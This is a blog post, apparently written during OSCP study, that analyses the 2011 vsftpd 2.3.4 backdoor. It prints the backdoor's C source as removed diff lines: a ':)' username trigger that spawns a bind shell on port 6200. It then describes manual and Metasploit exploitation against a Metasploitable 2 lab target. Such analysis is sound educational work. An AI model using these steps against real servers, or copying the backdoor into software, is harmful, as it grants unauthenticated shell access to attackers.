Linxz' Blog

Still trying to think of something witty, I will let you know once I get something...

Home Blog OSCP Journey
11 November 2018

VSFTPD 2.3.4

Tags: backdoor - exploit - python

Introduction

Between June 30th - July 1st 2011 a backdoor was introduced into the vsftpd-2.3.4.tar.gz archive this backdoor allowed an attacker to get a bind shell to the system and thus compromising the system. Although the backdoor was removed quickly (July 3rd 2011) a lot of people downloaded this vulnerable version of VSFTPD, causing quite a lot of panic for sysadmins.

So, how does it work?

In general, it’s actually a pretty simple exploit, and whilst there is a Metasploit module you really don’t need to use it. The backdoor payload is initiated in response to a user sending :) to the server upon being prompted for a username, by sending that smiley face to the server it executes a function which opens a bind shell listener on port 6200 of the affected device.

Code Review

-    else if((p_str->p_buf[i]==0x3a)
-    && (p_str->p_buf[i+1]==0x29))
-    {
-      vsf_sysutil_extra();
-    }

As you can see in the above code, we’re checking if some input is equal to a certain value, to be specific, we’re checking if the user input is equal to 0x3a and 0x29 if this is true then we’re executing vsf_sysutil_extra(); a quick Google on 0x3a tells you it’s a : and a further Google on 0x29 shows a ) so as you can see there is the smiley face. So, now we know that we have this special input, let’s look at the vsf_sysutil_extra(); function as right now we don’t have anything that resembles a vulnerability.

-int
-vsf_sysutil_extra(void)
-{
-  int fd, rfd;
-  struct sockaddr_in sa;
-  if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
-  exit(1);
-  memset(&sa, 0, sizeof(sa));
-  sa.sin_family = AF_INET;
-  sa.sin_port = htons(6200);
-  sa.sin_addr.s_addr = INADDR_ANY;
-  if((bind(fd,(struct sockaddr *)&sa,
-  sizeof(struct sockaddr))) < 0) exit(1);
-  if((listen(fd, 100)) == -1) exit(1);
-  for(;;)
-  {
-    rfd = accept(fd, 0, 0);
-    close(0); close(1); close(2);
-    dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
-    execl("/bin/sh","sh",(char *)0);
-  }
-}
-
-

As you can see above, we’re creating a bind socket and setting up a listener process on that socket. We’re opening this socket on port 6200 and that is where the vulnerability lies, because we can now connect to this socket without any authentication process taking place.

Exploit

As I mentioned earlier we can exploit this using the Metasploit module exploit/unix/ftp/vsftpd_234_backdoor however, we can carry out this exploit manually fairly easily, we will look at both methods in this post.

It’s worth noting for the below exploitation examples I am using Metasploitable 2

Manual Exploitation

Firstly, let’s telnet to our affected device on port 21 using telnet ip port once we do that we’ll be asked for a username & password, let’s use :) as the username & pass as the password. If we wait a few seconds then port 6200 should be opened, you can also manually escape with ^] but waiting also works.

Now if we run an nmap scan on our target we should see that port 6200 is open, we can now use telnet ip port again and that’s it! We now have shell access, if the service was running on a root account in a network we’d now have a root account in that network, simple, right?

Metasploit Exploitation

As I mentioned, we can use the Metasploit module to carry out this attack however I do actually prefer doing it manually, nonetheless, let’s get into this. Once again I am using Metaspolitable 2 as my target.

Start Metasploit using msfconsole then run use exploit/unix/ftp/vsftpd_234_backdoor now all we need to do is configure the host of the target, if you use show options you should see the RPORT field is already correct, to set the RHOST field use set rhost ip then we just type run and that’s it, the script will carry out the attack for you, with a few exceptions it pretty much just does what you did manually, you can find a link to the Rapid7 page at the bottom of this post. But that’s it! That’s all we needed to do, now you have a shell.

Metasploit Example

Python Exploitation

After browsing the Internet for a while I found this blog post which showed an implementation of the Metasploit module in Python. As you can see, this is a Python 2 implementation, so for my own benefit I decided to rewrite the script into Python 3, you can find my Python 3 implementation repo here

References

Rapid7 Metasploit Module

vsftpd 2.3.4 Vulnerable Code

Metasploit Module Exploit Code

Python 2 Exploit Implementation